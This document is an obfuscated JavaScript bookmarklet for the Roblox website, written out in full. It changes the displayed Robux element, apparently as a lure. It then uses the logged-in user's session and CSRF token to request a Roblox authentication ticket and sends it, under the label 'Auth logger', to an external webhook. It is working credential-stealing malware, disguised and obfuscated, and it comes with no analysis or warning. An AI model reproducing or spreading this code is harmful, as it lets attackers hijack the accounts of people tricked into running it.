javascript:(function(c,e){for(var d=c();;)try{if(-parseInt(u(156,-234))*(-parseInt(u(210,-100))/2)+-parseInt(u(128,-176))/3+parseInt(u(193,-101))/4*(parseInt(u(231,230))/5)+parseInt(u(143,210))/6+-parseInt(u(157,-158))/7*(-parseInt(u(225,-131))/8)+parseInt(u(222,-82))/9+-parseInt(u(208,-122))/10===e)break;else d.push(d.shift())}catch(g){d.push(d.shift())}})(K,774011);
function u(c,e){var d=K();return u=function(g,n){g-=125;var m=d[g];if(void 0===u.EGzsMk){var t=function(q){for(var k="",r="",C=k+t,z=0,A,x,B=0;x=q.charAt(B++);~x&&(A=z%4?64*A+x:x,z++%4)?k+=0!==C.charCodeAt(B+10)-10?String.fromCharCode(255&A>>(-2*z&6)):z:0)x="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=".indexOf(x);q=0;for(C=k.length;q<C;q++)r+="%"+("00"+k.charCodeAt(q).toString(16)).slice(-2);return decodeURIComponent(r)};u.QDLOmV=t;c=arguments;u.EGzsMk=!0}var w=g+d[0],y=c[w];
y?m=y:(y=function(q){this.bwGqri=q;this.nYgCjT=[1,0,0];this.hoMDEj=function(){return"newState"};this.FWrhrc="\\w+ *\\(\\) *{\\w+ *";this.WyQqVv="['|\"].+['|\"];? *}"},y.prototype.afabFL=function(){var q=(new RegExp(this.FWrhrc+this.WyQqVv)).test(this.hoMDEj.toString())?--this.nYgCjT[1]:--this.nYgCjT[0];return this.fQnypQ(q)},y.prototype.fQnypQ=function(q){return~q?this.gxxGQn(this.bwGqri):q},y.prototype.gxxGQn=function(q){for(var k=0,r=this.nYgCjT.length;k<r;k++)this.nYgCjT.push(Math.round(Math.random())),
r=this.nYgCjT.length;return q(this.nYgCjT[0])},(new y(u)).afabFL(),m=u.QDLOmV(m),c[w]=m);return m},u(c,e)}
var v=function(){var c={};c[u(211,1109)]=function(d,g){return d!==g};c[u(163,-352)]=u(217,-187);c[u(135,-279)]=u(131,938);var e=!0;return function(d,g){var n=e?function(){if(g){if(c[u(211,-500)](c.zOBCG,c[u(135,741)])){var m=g[u(144,-589)](d,arguments);return g=null,m}var t=n?function(){if(t){var w=o.apply(a,arguments);return W=null,w}}:function(){};return s=!1,t}}:function(){};return e=!1,n}}(),h=v(this,function(){var c={};c[u(200,87)]="(((.+)+)+)+$";return h[u(189,842)]().search(c[u(200,885)])[u(189,
890)]()[u(190,828)+"r"](h)[u(148,18)](c.RkXXH)});function b(c,e,d,g){return u(g-799,e)}h();
var l=function(){var c={};c[u(212,117)]=function(d,g){return d===g};c.lzXbw="CaplO";c[u(150,-57)]=u(174,-1);c[u(127,-30)]=function(d,g){return d===g};c[u(239,106)]=u(229,78);var e=!0;return function(d,g){if(c[u(127,-3)](c[u(239,-232)],c[u(239,-281)])){var n=e?function(){if(g)if(c[u(212,-559)](c[u(214,138)],c[u(150,111)])){if(d){var t=m.apply(t,arguments);return V=null,t}}else return t=g[u(144,70)](d,arguments),g=null,t}:function(){};return e=!1,n}var m=n?function(){if(m){var t=o[u(144,-290)](a,arguments);
return W=null,t}}:function(){};return s=!1,m}}(),f=l(this,function(){for(var c={RInBb:u(195,-182)+"3",vXfML:function(k,r){return k!==r},SMacI:u(139,-367),bktuo:function(k,r){return k(r)},qIPPr:function(k,r){return k+r},tiYvI:function(k,r){return k+r},SSQSx:u(242,-161)+u(203,-272),RCRqY:u(137,-238)+u(248,-184)+u(198,-275)+" )",tFLSM:function(k,r){return k===r},YKmTN:"koQJd",AzuOH:u(145,-337),VtIVq:u(179,-209),sUdjU:u(133,-275),CUhFb:u(221,-235),bUGUf:u(126,-335),FvMFW:u(249,-257),evCmG:u(170,-202)+
"3"},e=function(){var k={};k.bDEUx=c[u(199,-557)];k[u(187,-535)]=u(146,886)+"+$";try{if(c.vXfML(c[u(161,-600)],u(139,-560)))for(var r=k.bDEUx[u(191,-601)]("|"),C=0;;){switch(r[C++]){case "0":x[u(189,-619)]=A[u(189,942)].bind(A);continue;case "1":var z=q[k];continue;case "2":x[u(240,-474)]=B[u(245,-469)](J);continue;case "3":r[z]=x;continue;case "4":var A=k[z]||x;continue;case "5":var x=w.constructor[u(172,-638)][u(245,-445)](y);continue}break}else var B=c.bktuo(Function,c.qIPPr(c[u(233,-520)](c.SSQSx,
c[u(184,958)]),");"))()}catch(D){if(c[u(130,-633)](c[u(237,-528)],c[u(183,911)]))return e.toString()[u(148,858)](k.xsOyQ)[u(189,-562)]()[u(190,963)+"r"](d).search(k[u(187,-545)]);B=window}return B}(),d=e[u(136,-296)]=e[u(136,-273)]||{},g=[c[u(213,-264)],c[u(196,-246)],u(166,-308),c[u(167,-250)],c[u(247,-218)],"table",c[u(223,-183)]],n=0;n<g[u(218,-248)];n++)for(var m=c[u(251,-190)][u(191,-207)]("|"),t=0;;){switch(m[t++]){case "0":var w=g[n];continue;case "1":q[u(189,-300)]=y[u(189,-263)].bind(y);
continue;case "2":var y=d[w]||q;continue;case "3":d[w]=q;continue;case "4":var q=l.constructor[u(172,-285)][u(245,-187)](l);continue;case "5":q[u(240,-190)]=l.bind(l);continue}break}});f();document[b(1005,936,1010,980)+b(929,1010,917,963)]("nav-robux-"+b(934,973,971,975)).innerHTML=b(1045,949,984,1008);
function K(){var c="Bu90twq A3PNrfO wuTTve4 zs9qBgfJzuXHDq wM1vANe x19WCM90B19F zxf1zxn0r2fTzq CMv0DxjUicHMDq rLflzM4 oKLUqxbW yMLUza C2nVCMqUy29TlW yLvhvwy y3rVCIGICMv0Dq DhjHy2u mte4oda0nJe3ma zxzdBuC tuq0DI1zn3e1uW zxHJzxb0Aw9U y1nJqLK mJqWmZu2n1jbzhzhqW y29Tl3yXl2f1Da Dezmu00 D3Pktem yNz5Eu0 D2fYBG k0XHDw5JAev4Ca C1PQtuy y29UC29Szq E30Uy29UC3rYDq DgGUCM9IBg94lG uhvPu3C BI9QC29U mJuWotu5mJC1mG y2HLCNvYBdPODa nZe2odmZmLrxv1nqtG yxbWBhK D0zVCMG kcGOlISPkYKRkq ALbFB3rMuZLMlq C2vHCMnO y2HTB2rLoNbSyq sgn3AeC Ahr0Chm6lY9HDq yxbPl3DLyMHVBW B3GUy29Tl2DHBq yxbWBgLJyxrPBW y2ndu1b2CJKZzG mJKWnJu3t1vmtw9t mJC1mw5wB25jsG Aw5JBhvKzq z2v0 BMnOzxiUyxnOEa u01Hy0K AgvHzgvYCW EK9cq0C qNLjza vg93zxO Aw5MBW q1vOrMi jMLZugXHEvrVzW k3bSywnLBgf1BG nhWWFdj8nxWXFa jNbSywnLswq9mq ChjVDg90ExbL DgDHBwuUCM9IBa v2L1EvC mdGVnezesxe1rW yw1VDw50 ue9tva BI10AwnRzxq Bg9N B2nHBgu6zw5FDq z2v0rwXLBwvUDa EwvYoJeRBgf1BG qxP1t0G uKnsCvK Ahr0Chm6lY9KAq DhbZoI8VyxnZzq EhnpEve A3mVmtaYnZiWnq Dg9tDhjPBMC y29UC3rYDwn0BW C3bSAxq n2jdnK4Xy3PuEq mZi3odKYDuHqtLLI A3fYq3K nxWXFdr8mNWWFa C1vKALu oti3ntiRCM9IBa CM4GDgHPCYiPka uKLUqMi uMTyweG odm3mdqWnJuYna C3rYAw5NAwz5 BMn0Aw9UkcKG AgvUDgLJyxrPBW zMfSC2uRyNjVDW EsTNyw1LAw5MBW A0nYC0i mtC0mZC1ntbfEhrewvi ntiZsW mMTos0XPwq r1vit2G BhzUEKO vNrjvNe BhPyyNC rtrwm2nsuKHKsq DgLJyxrPB24TDa wM11tvq BgvUz3rO Cf84BJLQDxPRoq Awq6mtqYnta5nq zxjYB3i ndK4ntCZowvIzengza rNznrLC DgHLBG nJaYnfH0rNDguW jMjYB3DZzxjuCG CMj4lwf1DgHLBG zwrtyM0 Ewnbz2i CYTJAgfUBMvSoG nJbwAezAqwm BM93 DgLzDKK k2XHDw5JAhrPBq".split(" ");K=
function(){return c};return K()}function p(c,e,d,g){return u(d-308,e)}
fetch(b(905,988,968,950)+p(393,423,446,417)+b(987,898,914,928)+b(946,941,1040,1003)+p(423,542,486,428),{headers:{"x-csrf-token":Roblox.XsrfToken.getToken()},credentials:b(1005,997,945,957),method:p(504,428,485,469)})[b(1080,972,1019,1023)](function(c){function e(n,m,t,w){return p(n-237,n,w- -286,w-423)}function d(n,m,t,w){return p(n-445,m,w- -680,w-127)}var g={kCrsB:function(n,m,t){return n(m,t)},mOtMd:d(-204,-141,-226,-187)+e(240,295,310,268)+d(-179,-179,-200,-220)+e(270,186,202,210)+e(223,222,270,
223)+d(-244,-140,-174,-197)+d(-263,-272,-227,-247)+e(193,201,269,241)+d(-248,-161,-227,-225)+e(154,174,195,214)+e(179,184,230,177)+e(191,192,193,237)+"E",IPkrh:d(-164,-214,-147,-195),bvyyM:e(149,225,234,176)+e(217,119,161,162),FQKfn:"Auth logger",Towez:function(n,m){return n+m},kzgDZ:function(n,m){return n+m},WiCWf:function(n,m){return n+m},edSbm:"roblox-pla"+e(168,217,249,204)+e(195,130,147,171)+e(182,177,185,228)+":",kqrCy:d(-153,-114,-148,-138)+"e:"};authticket=c[e(167,139,247,184)][d(-169,-268,
-254,-213)](d(-125,-130,-97,-145)+e(257,256,178,238)+"icket");g[d(-176,-173,-203,-165)](fetch,g[d(-77,-87,-161,-137)],{method:g.IPkrh,headers:{"Content-Type":g[e(205,166,119,154)]},body:JSON[d(-229,-162,-137,-170)]({username:g[d(-104,-161,-83,-129)],embeds:[{description:g[d(-151,-256,-170,-207)](g[e(240,235,260,258)](g.WiCWf(g[e(292,201,264,250)],authticket)+g[e(225,276,251,216)],Date[e(203,198,261,254)]()),e(229,190,228,191)+d(-256,-208,-284,-230)+d(-192,-205,-161,-186)+e(188,132,231,195)+e(202,
170,165,175)+e(302,250,198,260)+e(240,237,170,182)+"?request=R"+d(-125,-146,-128,-131)+e(191,244,250,248)+"ackerId=14"+d(-196,-219,-244,-231)+d(-137,-257,-144,-201)+d(-103,-171,-70,-122)+e(172,175,232,190)+"etherGame="+d(-226,-156,-166,-167)+"sertracker"+d(-158,-147,-101,-152)+d(-178,-127,-192,-175)+"oxLocale:en_us+gameL"+e(161,157,205,202)+d(-154,-84,-201,-142)+e(167,101,121,156)+d(-116,-143,-84,-128))}]})})});
